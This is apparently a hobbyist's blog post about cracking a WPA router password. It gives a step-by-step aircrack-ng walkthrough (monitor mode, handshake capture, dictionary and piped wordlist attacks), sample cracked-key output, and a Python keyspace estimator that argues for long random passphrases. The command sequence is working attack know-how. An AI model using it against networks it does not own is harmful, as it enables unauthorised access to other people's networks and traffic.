Cracked my first wireless network today. A friend I made at a phone unlocking shop here in Kono district had a NetGear router he "found" and he couldn't reset the password to use it. I wanted to try to see if I could get into it myself before just restoring it to factory defaults. A few hours later with aircrack and its docs, I got as far as starting a brute-force attack on the router with a huge dictionary word list. Having made it far enough to just let it sit for the next 24 hours and crack, I decided to just reset the router to its factory defaults, make the password an extremely secure "aaaaa123", and then let it run its course for a few minutes. And voila, cracked it!
Make sure to run everything with root privileges.
Put your wireless card into "monitor" mode (normally in "managed")
$ sudo ifconfig wlan0 down
$ sudo iwconfig wlan0 mode monitor
$ sudo ifconfig wlan0 up
Start listening on your wlan0 interface
$ airmon-ng start wlan0
Begin sniffing packets to see the available access points and their MAC addresses
$ airodump-ng wlan0
Capture the WPA four-way handshake by saving the sniffed packets for the target access point to a file for use in the next step.
$ airodump-ng --channel <the AP channel> --bssid <MAC of AP> --write some_file_name mon0
Run a dictionary attack against the captured handshake (this runs offline against the .cap file, not against the access point itself).
$ aircrack-ng -b <MAC of AP> -w <wordlist file> some_file_name.cap
If you don't have a dictionary file you can use wordfield to generate passwords and pipe them in.
$ wordfield -a -n 8 10 | sudo aircrack-ng -w - -b <MAC of AP> your-cap-file.cap -K
Results from a later test
Aircrack-ng 1.1

[00:16:00] 1588024 keys tested (1668.83 k/s)

KEY FOUND! [ jeffnetwork ]

Master Key    : 6D 02 BB DB 2C 6C 59 51 1E 35 E1 D3 A5 C0 5F 8A F3 A7 BB 1A DF DF 5A 3F C8 74 DB 6F DF 58 63 66
Transient Key : 06 BC D9 30 12 74 1A 25 A8 3A E6 1B 14 EC 71 05 F3 6E 51 C5 A0 8E A1 63 2D 07 3A 2D C5 A0 15 A9 A8 3E 76 D7 99 51 5C 20 DC 1C A9 E3 FD 77 22 5F 5E F8 A5 65 EB 88 A7 AB AB 6F 56 A6 28 14 4F E2
EAPOL HMAC    : 93 44 CA 90 0E 15 04 B5 49 E9 10 FB FF 2A 54 AF
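Why "aaaaa123" fell in minutes while the real dictionary run was projected to take a day comes down to two numbers: the fixed cost of each guess and the size of the space the guess lives in. The estimator below is an added example, not code from the post. It uses the 1668.83 k/s rate printed above, derives the WPA/WPA2-PSK Pairwise Master Key exactly as the standard defines it (this is the "Master Key" line in the output), and shows how long exhausting a few keyspaces would take at that rate. The SSID and passphrase values are constructed, since the post does not give the SSID behind its Master Key.

```python
import hashlib

# Key-testing rate from the aircrack-ng run above (1668.83 k/s), in keys per second.
AIRCRACK_RATE_KPS = 1668.83 * 1000


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-PSK Pairwise Master Key (aircrack's 'Master Key').

    Every candidate passphrase pays this fixed cost: PBKDF2-HMAC-SHA1 with the
    SSID as salt, 4096 rounds, 256-bit output. That cost is what caps the k/s
    figure, and the salt is why a table built for one SSID is useless for another.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Number of candidates over all lengths from min_len to max_len inclusive."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def seconds_to_exhaust(space: int, rate_kps: float = AIRCRACK_RATE_KPS) -> float:
    """Worst-case time to try every candidate in the space at the observed rate."""
    return space / rate_kps


def human(seconds: float) -> str:
    """Render a duration in the largest unit that fits (years, days, hours, minutes)."""
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    # Constructed SSID and passphrase; the post's SSID is not given.
    print("PMK:", wpa_pmk("aaaaa123", "example-ssid").hex())
    for label, charset, lo, hi in (
        ("8 lowercase letters", 26, 8, 8),
        ("8 to 10 lowercase letters and digits", 36, 8, 10),
        ("16 mixed-case letters and digits", 62, 16, 16),
    ):
        print(f"{label}: {human(seconds_to_exhaust(keyspace(charset, lo, hi)))}")
```

The short passphrase was found quickly only because it was in the wordlist; a 16-character random passphrase is out of reach at this rate by a factor measured in billions of years, which is the practical defence.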
Note: Hacking someone's password is illegal, so make sure to abide by the laws set in place by your local law enforcement agency and all that.